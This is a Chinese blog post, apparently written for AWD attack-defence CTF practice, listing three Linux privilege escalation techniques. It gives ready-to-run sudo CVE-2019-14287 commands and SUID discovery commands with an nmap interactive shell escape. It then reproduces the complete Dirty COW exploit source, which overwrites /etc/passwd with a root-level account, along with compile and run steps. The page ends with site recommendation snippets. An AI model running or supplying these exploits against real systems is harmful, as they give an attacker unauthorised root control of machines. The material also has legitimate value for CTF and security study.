Linux提权:常用三种方法

最新推荐文章于 2024-05-14 11:09:12 发布
最新推荐文章于 2024-05-14 11:09:12 发布
阅读量6.5k 收藏 41
点赞数 2
分类专栏: AWD
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41617034/article/details/105587577
版权

一、sudo提权(CVE-2019-14287)

#以root身份执行命令:
sudo -u#-1 id
sudo -u#4294967259 cat /flag

#以root身份登录:
sudo -u#-1 /bin/bash
sudo -u#4294967259 /bin/bash

二、SUID提权

获取root权限

find / -perm -u=s -type f 2>/dev/null
nmap --interactive
!sh

注:
(1)以下方法和find / -perm -u=s -type f 2>/dev/null异曲同工

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;

(2)如果要获取普通权限的命令行,使用!bash
(3)使用-exec需要配合\

三、脏牛漏洞提权

利用条件:linux内核版本大于等于2.6.22
poc:dirty.c

//
// This exploit uses the pokemon exploit of the dirtycow vulnerability
// as a base and automatically generates a new passwd line.
// The user will be prompted for the new password when the binary is run.
// The original /etc/passwd file is then backed up to /tmp/passwd.bak
// and overwrites the root account with the generated line.
// After running the exploit you should be able to login with the newly
// created user.
//
// To use this exploit modify the user values according to your needs.
//   The default is "firefart".
//
// Original exploit (dirtycow's ptrace_pokedata "pokemon" method):
//   https://github.com/dirtycow/dirtycow.github.io/blob/master/pokemon.c
//
// Compile with:
//   gcc -pthread dirty.c -o dirty -lcrypt
//
// Then run the newly create binary by either doing:
//   "./dirty" or "./dirty my-new-password"
//
// Afterwards, you can either "su firefart" or "ssh firefart@..."
//
// DON'T FORGET TO RESTORE YOUR /etc/passwd AFTER RUNNING THE EXPLOIT!
//   mv /tmp/passwd.bak /etc/passwd
//
// Exploit adopted by Christian "FireFart" Mehlmauer
// https://firefart.at
//

#include <fcntl.h>
#include <pthread.h>
#include <string.h>
#include <stdio.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <sys/ptrace.h>
#include <stdlib.h>
#include <unistd.h>
#include <crypt.h>

const char *filename = "/etc/passwd";
const char *backup_filename = "/tmp/passwd.bak";
const char *salt = "firefart";

int f;
void *map;
pid_t pid;
pthread_t pth;
struct stat st;

struct Userinfo {
   char *username;
   char *hash;
   int user_id;
   int group_id;
   char *info;
   char *home_dir;
   char *shell;
};

char *generate_password_hash(char *plaintext_pw) {
  return crypt(plaintext_pw, salt);
}

char *generate_passwd_line(struct Userinfo u) {
  const char *format = "%s:%s:%d:%d:%s:%s:%s\n";
  int size = snprintf(NULL, 0, format, u.username, u.hash,
    u.user_id, u.group_id, u.info, u.home_dir, u.shell);
  char *ret = malloc(size + 1);
  sprintf(ret, format, u.username, u.hash, u.user_id,
    u.group_id, u.info, u.home_dir, u.shell);
  return ret;
}

void *madviseThread(void *arg) {
  int i, c = 0;
  for(i = 0; i < 200000000; i++) {
    c += madvise(map, 100, MADV_DONTNEED);
  }
  printf("madvise %d\n\n", c);
}

int copy_file(const char *from, const char *to) {
  // check if target file already exists
  if(access(to, F_OK) != -1) {
    printf("File %s already exists! Please delete it and run again\n",
      to);
    return -1;
  }

  char ch;
  FILE *source, *target;

  source = fopen(from, "r");
  if(source == NULL) {
    return -1;
  }
  target = fopen(to, "w");
  if(target == NULL) {
     fclose(source);
     return -1;
  }

  while((ch = fgetc(source)) != EOF) {
     fputc(ch, target);
   }

  printf("%s successfully backed up to %s\n",
    from, to);

  fclose(source);
  fclose(target);

  return 0;
}

int main(int argc, char *argv[])
{
  // backup file
  int ret = copy_file(filename, backup_filename);
  if (ret != 0) {
    exit(ret);
  }

  struct Userinfo user;
  // set values, change as needed
  user.username = "firefart";
  user.user_id = 0;
  user.group_id = 0;
  user.info = "pwned";
  user.home_dir = "/root";
  user.shell = "/bin/bash";

  char *plaintext_pw;

  if (argc >= 2) {
    plaintext_pw = argv[1];
    printf("Please enter the new password: %s\n", plaintext_pw);
  } else {
    plaintext_pw = getpass("Please enter the new password: ");
  }

  user.hash = generate_password_hash(plaintext_pw);
  char *complete_passwd_line = generate_passwd_line(user);
  printf("Complete line:\n%s\n", complete_passwd_line);

  f = open(filename, O_RDONLY);
  fstat(f, &st);
  map = mmap(NULL,
             st.st_size + sizeof(long),
             PROT_READ,
             MAP_PRIVATE,
             f,
             0);
  printf("mmap: %lx\n",(unsigned long)map);
  pid = fork();
  if(pid) {
    waitpid(pid, NULL, 0);
    int u, i, o, c = 0;
    int l=strlen(complete_passwd_line);
    for(i = 0; i < 10000/l; i++) {
      for(o = 0; o < l; o++) {
        for(u = 0; u < 10000; u++) {
          c += ptrace(PTRACE_POKETEXT,
                      pid,
                      map + o,
                      *((long*)(complete_passwd_line + o)));
        }
      }
    }
    printf("ptrace %d\n",c);
  }
  else {
    pthread_create(&pth,
                   NULL,
                   madviseThread,
                   NULL);
    ptrace(PTRACE_TRACEME);
    kill(getpid(), SIGSTOP);
    pthread_join(pth,NULL);
  }

  printf("Done! Check %s to see if the new user was created.\n", filename);
  printf("You can log in with the username '%s' and the password '%s'.\n\n",
    user.username, plaintext_pw);
    printf("\nDON'T FORGET TO RESTORE! $ mv %s %s\n",
    backup_filename, filename);
  return 0;
}

gcc -pthread dirty.c -o dirty -lcrypt
./dirty 密码(这一步出结果可能有点慢,耐心等待一下)
su firefart

参考:
sudo提权:https://www.freebuf.com/vuls/217089.html
SUID提权:https://www.anquanke.com/post/id/86979
脏牛漏洞提权:https://github.com/FireFart/dirtycow/blob/master/dirty.c

1stPeak
关注
  • 2
    点赞
  • 41
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
升-linux手法总结
01-14
### 升-linux手法总结 #### 1. Linux概述 在Linux系统中,限管理是一项至关重要的安全措施。用户被赋予不同级别的限来访问系统资源和服务。然而,在某些情况下,攻击者可能会试图通过各种手段来...
linux 普通用户到root.docx
06-04
Linux 普通用户到 root 的方法和技术 Linux 操作系统中,普通用户如何到 root 是一个非常重要的安全问题。在 Linux 系统中,普通用户只能执行有限的操作,而 root 用户则拥有最高的限。因此,普通用户...
linux 总结
weixin_51681694的博客
06-13 7111
会继续补充.....
Linux 基础命令-sudo命令详解
xyz的专栏
06-21 3396
sudo 以其他身份来执行命令 补充说明 sudo命令 用来以其他身份来执行命令,预设的身份为root。在/etc/sudoers中设置了可执行sudo指令的用户。若其未经授的用户企图使用sudo,则会发出警告的邮件给管理员。用户使用sudo时,必须先输入密码,之后有5分钟的有效期限,超过期限则必须重新输入密码。 语法 sudo(选项)(参数) 选项 -b:在后台执行指令; -E:继承当前环境变量 -h:显示帮助; -H:将HOME环境变量设为新身份的HOME环境变量; -k:结束密码的有效期限,也就是
linux各种姿势升超超超细致教程
最新发布
qq_41245301的博客
05-14 1230
PATH 环境变量劫持,因为PATH环境变量是按照路径顺序执行命令,当黑客把恶意脚本改成你常用的命令并且,把路径改到最前面,那么久会发生环境变量劫持。重点关系统任务计划配置文件(/etc/crontab)的内容?检查root用户的任务计划?查看有没有错误的配置服务?查看配置文件是否包含有漏洞的插件?检查root用户的任务计划(普通用户是没有限查看的)那些服务是开机运行的?查看当前目下可以读的文件。查看当前目下可以写的文件。查看cron目录中的内容。查看我们具有写入限的脚本。查看socket的路径。
Linux方法总结
Ays.Ie的博客
11-06 3608
Linux方式总结
linux sudo命令
y1412813204的博客
02-15 575
作用 sudo命令可以让你临时使用某个用户的身份执行命令而不需要切换用户 使用方法 sudo -u [想要使用的用户身份(如果不写,则默认为root)] 命令 示例 1.使用wdy用户,在/tmp目录下,创建一个文件sudo_test sudo -u wdy touch /tmp/sudo_test 通过查看文件详细信息,发现文件的属主和属组竟然都是wdy,那么就说明了sudo确实可以使用其他用...
Linux上sudo使用方法简介
树下一少年的博客
01-09 1万+
本文基于Linux上CentOS 7版本进行配置演示 Linux上使用sudo命令给其他用户,为其赋予超级用户限执行部分无限命令以及sudo的常见参数简介 一.编辑配置文件给其他用户配置 1.查看配置文件内常用的参数 2.查看其他用户无限时的情况 3.为其他用户配置sudo限并测试 二.配置文件使其他用户执行sudo命令时无需密码 1.深感输密码的麻烦,为其设置使用sudo无需密码 2.在其他用户方测试 三.sudo命令的常见参数 1.sudo -h 2.sudo -l
Linux的简单总结1
08-03
本文将围绕Linux的基本概念、文件限解析以及思路进行深入探讨。 首先,理解Linux文件限至关重要。在`ls -al`命令输出中,每个条目都有七个字段,例如`-rw-r--r-- 1 root root 56 Jun 16 23:29 hash.txt...
linux 入侵常用命令汇编
09-16
Linux 入侵常用命令汇编 本资源汇编了 Linux 入侵中常用的命令,...* `dd if=/dev/zero of=yourfile bs=10M count=10` 建立一个 100M 的大文件,在利用 Linux Kernel (proc) Local RootExploit 的时候要用到的。
Linux入侵常用命令之防黑客示例代码
09-15
Linux入侵常用命令之防黑客示例代码】这篇文章主要探讨了在Linux环境下,黑客可能使用的攻击手段以及如何防止这些攻击。以下是对文章中涉及的知识点的详细解释: 1. **PHP一句话后门**: 黑客可能会通过上传包含...
Linux
m0_57856283的博客
03-12 1万+
将这个虚拟文件导入虚拟机 开机默认没密码 账号:Bob 密码:secret root账号密码secret123 进去之后是这样的 我们先查看他的ip地址 这里我们看到他是没有IP地址的 我们先切换到root账户 进来之后需要改一个配置文件 然后我们看到了它已经获取到了ip 然后我们打开kali远程到被害机,注意,我们用普通用户远程过去 ssh bob@192.168.179.138 我们可以看到他已经远程了过来 过来之后我们可以先·看看他是什...
Linux大全
yggcwhat
05-14 9450
Linux大全
ubuntu 使用 root “sudo /bin/bash”
weixin_30621711的博客
05-18 297
之前使用root 怎么使用的 sudo passwd root 123456 123456 su root 或者 su - root 不知道使用 sudo /bin/bash 有什么不一样? 转载于:https://www.cnblogs.com/kwingmei/p/3734785.html...
linux命令之sudo详解
热门推荐
全栈行动派的博客
05-23 1万+
sudo命令 用来以其他身份来执行命令,预设的身份为root。在/etc/sudoers中设置了可执行sudo指令的用户。若其未经授的用户企图使用sudo,则会发出警告的邮件给管理员。用户使用sudo时,必须先输入密码,之后有5分钟的有效期限,超过期限则必须重新输入密码。
Linux基本功系列之sudo命令
高性价比服务器就选:蓝易云
07-30 483
sudo命令是Linux系统中的一个重要工具,允许普通用户以超级用户的限执行命令,以高系统安全性和管理灵活性。通过sudo,管理员可以精确控制用户的限,并限制对系统资源的访问。合理使用sudo命令,可以高系统的安全性和管理效率。在命令行中,将需要以超级用户限执行的命令放在sudo命令之后,并在需要时输入当前用户的密码进行身份验证。sudo是一个常用Linux命令,用于以超级用户的限执行命令。
Linux中的操作
weixin_52757485的博客
08-01 2137
具体工作过程:当用户执行sudo时,系统会主动寻找/etc/sudoers文件,判断该用户是否有执行sudo的限,确认用户具有执行限后,让用户输入用户自己的密码确认,若密码输入成功,则开始执行sudo后续的命令。临时方法是用sudo的工作原理:将当前用户切换到超级用户下,以超级用户身份执行命令,执行完成后,直接退回到当前用户。[root@localhost ~]# vim /etc/sudoers (进入/etc/sudoers)(成功在普通用户下临时
sudo 入门指南
yangsucheng的博客
03-14 1953
你在使用 Linux 命令行时曾经得到过“拒绝访问Permission denied”的错误示吗?这可能是因为你正在尝试执行一个需要 root 限的操作。例如,下面的截图展示了当我尝试复制一个二进制文件到一个系统目录时产生的错误。 那么该怎么解决这个错误?很简单,使用 sudo 命令。 用户运行此命令后会被示输入他们(自己)的登录密码。一旦输入了正确的密码,操作将
Linux 】系统学习 | Linux 下的su与sudo命令你以为你会用了?
02-04 2433
系统学习 | Linux 下的su与sudo命令你以为你会用了?
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

1stPeak

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值